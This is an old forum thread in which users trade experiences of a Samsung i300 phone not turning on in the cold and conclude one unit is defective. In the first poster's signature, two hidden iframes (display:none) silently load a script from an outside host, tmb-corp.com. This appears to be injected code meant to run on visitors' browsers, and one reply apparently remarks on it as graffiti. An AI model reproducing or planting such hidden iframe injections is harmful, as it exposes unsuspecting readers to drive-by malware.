+ Reply to Thread

Cold Weather Issues?

So awhile ago I posted about problems with the I300 not coming on, it kept saying it was in low battery.... After extensive research, I now know the solution. It seems that whenever the phone is below say 70° F, it doesn't want to come on. Living in Michigan, this means it won't work outside during the winter. So I leave it in my car while at hockey, and it doesn't work when I come out. I turn the heater on, hold the phone up to it for about 30 seconds, it warms up, and it will then work fine....

Anyone else live in the cold and have the phone work fine?

chw<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Hello. I tell you what , I'm down here in Chicago and it is cold. I mean it is COLD - and WINDY> Saw a report that it was 80 in Miami today. I'm not watching the weather channel anymore.

Anyway, I use my phone outside all the time. No such problems. I mean, provided, I don't put it down and walk away from it; I keep it in my pocket. I don't know why you do. What are you doing with your phone outside to make it so cold?

Oakland Michigan? I used to reside their in Farmington Hills. Where are you?

ok, thats strange. I live in Buffalo, and its COOOOOLLD (and snow, like 7 feet of it). I go skiing ALL the time, and have been diong so this entire week, every day. I take my i300 in my ski jacket with me. I ski mostly at night, so the temps drop quite a bit, into the 20's and teens. On top of that, the wind from downhill skiing really cools down my jacket. I have pulled out my i300 many times atop the ski slope and it has worked flawlessly each time. The screen fires up nicely, no differently than it would if i was in my house. you must have some defect with your unit.

Originally posted by mjorange
    Oakland Michigan? I used to reside their in Farmington Hills. Where are you?
    Oakland used to be Lake Orion, but they changed the name for some reason about 10 years ago. Lake Orion still exists, but the south east corner of it is now called Oakland Township.

ok, so at least I now know it's a definite defect on my phone and not an issue wiht all phones..... Just leaving it in the charger overnight is enough to make it cold enough to not work (house is kept at 65°). Time to act on that insurance.

chw

Originally posted by Stillen_I30
    ok, thats strange. I live in Buffalo, and its COOOOOLLD (and snow, like 7 feet of it). I go skiing ALL the time, and have been diong so this entire week, every day. I take my i300 in my ski jacket with me. I ski mostly at night, so the temps drop quite a bit, into the 20's and teens. On top of that, the wind from downhill skiing really cools down my jacket. I have pulled out my i300 many times atop the ski slope and it has worked flawlessly each time. The screen fires up nicely, no differently than it would if i was in my house. you must have some defect with your unit.

I grew up in Syracuse!! Go Orange!

Craig:p
    I thought grafitti was illegal?

Strange, I haven't had any probs like that out here in San Diego...
    Cliff

Yea. Go Orange!!!

Whats the temp in San Diego today?

I'm in Ohio and I have left my i300 in the car many of times, when I come back it is very chilly but fires right up. The screen tends to have a bit of lag when it is really cold but the phone is fine.